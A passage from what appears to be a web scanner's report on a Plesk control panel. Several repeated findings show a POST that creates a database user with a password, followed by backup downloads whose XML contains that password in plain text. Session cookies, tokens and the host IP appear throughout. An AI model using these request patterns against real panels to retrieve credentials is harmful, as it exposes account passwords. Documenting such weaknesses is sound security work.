Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31541
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:37 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:36 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191505.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:37 GMT
Connection: close

PK.........xs?...../.../..$...6785858_z.xss.cx_info_1111191505.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.2. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31541
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:37 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:36 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191505.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:37 GMT
Connection: close

PK.........xs?...../.../..$...6785858_z.xss.cx_info_1111191505.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.3. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31857
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:32 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:30 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191500.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:32 GMT
Connection: close

PK.........xs?{..,./.../..$...6785858_z.xss.cx_info_1111191500.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.4. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 31857
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:32 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:30 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191500.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:32 GMT
Connection: close

PK.........xs?{..,./.../..$...6785858_z.xss.cx_info_1111191500.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.5. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 32408
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:54 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:52 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="49560ed563cac7221564ed96_z.xss.cx_info_1111191501.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:54 GMT
Connection: close

PK.........xs?2....0...0..5...49560ed563cac7221564ed96_z.xss.cx_info_1111191501.xml.....0.......0........0G.<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modificatio
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.6. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 32408
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:54 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:52 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="49560ed563cac7221564ed96_z.xss.cx_info_1111191501.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:54 GMT
Connection: close

PK.........xs?2....0...0..5...49560ed563cac7221564ed96_z.xss.cx_info_1111191501.xml.....0.......0........0G.<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modificatio
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.7. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 32017
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:56 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191502.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:56 GMT
Connection: close

PK.........xs?3..4./.../..$...6785858_z.xss.cx_info_1111191502.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.8. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

name=dorky&forgery_protection_token=6d786a85db2c64fc482c76c395bb6516&password=omgitsthepasswd&passwordConfirmation=omgitsthepasswd&hidden=

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:40:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:40:39 GMT
Content-Length: 83

{"redirect":"\/database\/properties\/id\/1","status":"success","statusMessages":[]}

Request 2

GET /plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0,must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 32017
Content-Type: application/octetstream
Expires: Sat, 19 Nov 2011 21:06:56 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Disposition: attachment; filename="6785858_z.xss.cx_info_1111191502.xml.zip"
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:56 GMT
Connection: close

PK.........xs?3..4./.../..$...6785858_z.xss.cx_info_1111191502.xml...../......./......../..<?xml version="1.0" encoding="UTF-8"?>
<!-- This is signed plesk backupfile. Any modification of this file wi
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...
<password type="plain">omgitsthepasswd</password>
...[SNIP]...

3.9. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/

Request 1

POST /smb/database/create-user/databaseId/1 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://50.22.21.242:8443/smb/database/create-user/databaseId/1
Content-Length: 126
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=dashboard
Pragma: no-cache
Cache-Control: no-cache

